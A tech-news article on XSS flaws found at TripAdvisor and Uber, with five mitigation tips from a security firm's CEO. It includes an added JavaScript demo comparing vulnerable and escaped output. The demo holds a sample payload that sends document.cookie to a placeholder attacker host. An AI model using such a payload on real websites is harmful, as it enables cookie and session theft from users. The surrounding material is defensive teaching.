Following reports that cross-site scripting (XSS) vulnerabilities were found this week on travel website Trip Advisor and rideshare site Uber, security experts labelled XSS flaws as the “easiest way for websites to be attacked”.

XSS is a class of security vulnerability typically found in web applications. It enables an attacker to inject client-side script into pages viewed by other users; because the injected script runs in the victim's browser with the privileges of the vulnerable site, it can be used to bypass access controls such as the same-origin policy.
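To make the mechanism concrete, here is an added example (not code from the article or from High-Tech Bridge) of the classic reflected XSS sink beside its hardened form. A "search results" page echoes a user-supplied query into HTML; the vulnerable version concatenates it raw, the hardened version applies HTML element-body encoding. The attacker payload is constructed for the demonstration, `attacker.example` is a placeholder host, and `cspHeaderValue` is a hypothetical helper showing a Content-Security-Policy header that would serve as a second line of defence.

```javascript
// Added example: a reflected XSS sink and its hardened form (not from the article).
// Both render functions build the HTML for a "search results" page from a
// user-supplied query, the classic place where untrusted input lands inside a page
// that the victim's browser will parse.

// Constructed attacker payload: once running in the victim's origin, this script
// could read document.cookie or issue authenticated same-origin requests.
// "attacker.example" is a placeholder host.
const PAYLOAD = '<script>fetch("https://attacker.example/c?" + document.cookie)</script>';

// Vulnerable: the query is concatenated straight into the markup, so any HTML it
// contains is parsed as HTML by the browser.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Contextual output encoding for an HTML element-body context: the five characters
// that can change the parser's state there are replaced with entity references.
// Attribute, URL and JavaScript contexts each need their own encoder; this one
// is not sufficient for those.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  }[ch]));
}

// Hardened: the same page, with the untrusted value encoded for the context it
// is placed in.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Hypothetical helper: a Content-Security-Policy value for the response carrying
// the page. Without 'unsafe-inline' the browser refuses to execute an inline
// <script> even if an encoding bug slips through. Defence in depth, not a
// replacement for output encoding.
function cspHeaderValue() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// Crude check used only for this demonstration: does the output contain an
// executable <script> start tag? In practice a real browser is the authority,
// not a regex.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demonstration.
console.log('vulnerable:', renderSearchVulnerable(PAYLOAD));
console.log('hardened:  ', renderSearchSafe(PAYLOAD));
console.log('CSP:       ', cspHeaderValue());
```

The encoder only covers the element-body context on purpose: a value placed inside an attribute, a URL or a script block needs the encoder for that context, which is where many "we already escape everything" sites still go wrong.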

Malicious hackers

Such vulnerabilities put website users, visitors and administrators at risk of being compromised by malicious hackers, with the potential theft of cookies, personal data, authentication credentials and browser history just the tip of the iceberg.

So what can you do to limit the chance of being attacked via an XSS vulnerability? Here, Kolochenko, CEO of ethical hacking services firm High-Tech Bridge, shares five security tips for XSS damage limitation.

1. Explain to your web developers that one XSS vulnerability may lead to total compromise of the entire company.

2. Make sure your web developers and server admins respect security best practices. This will already resolve the majority of potential problems.

3. Make sure that your IT team has a clear inventory of your web resources, and that there are no abandoned or test web projects that are accessible from the outside.

4. Never rely on your web application firewall (WAF) as the sole security solution aimed at preventing all types of attacks.

5. Regularly conduct web penetration testing by independent companies.

Kolochenko said: “SQL injection vulnerabilities are becoming more and more rare, as well as other high and critical risk vulnerabilities. They are complex to detect and quite often require a lot of time to exploit. At the same time almost nobody cares about ‘medium-risk’ XSS vulnerabilities, leaving their websites vulnerable. Obviously, hackers benefit from such negligence and use XSS vulnerabilities to achieve their goals. If you close your door, don’t forget to close your windows – otherwise the entire security is at risk.”

Duncan MacRae

Duncan MacRae is former editor and now a contributor to TechWeekEurope. He previously edited Computer Business Review's print/digital magazines and CBR Online, as well as Arabian Computer News in the UAE.
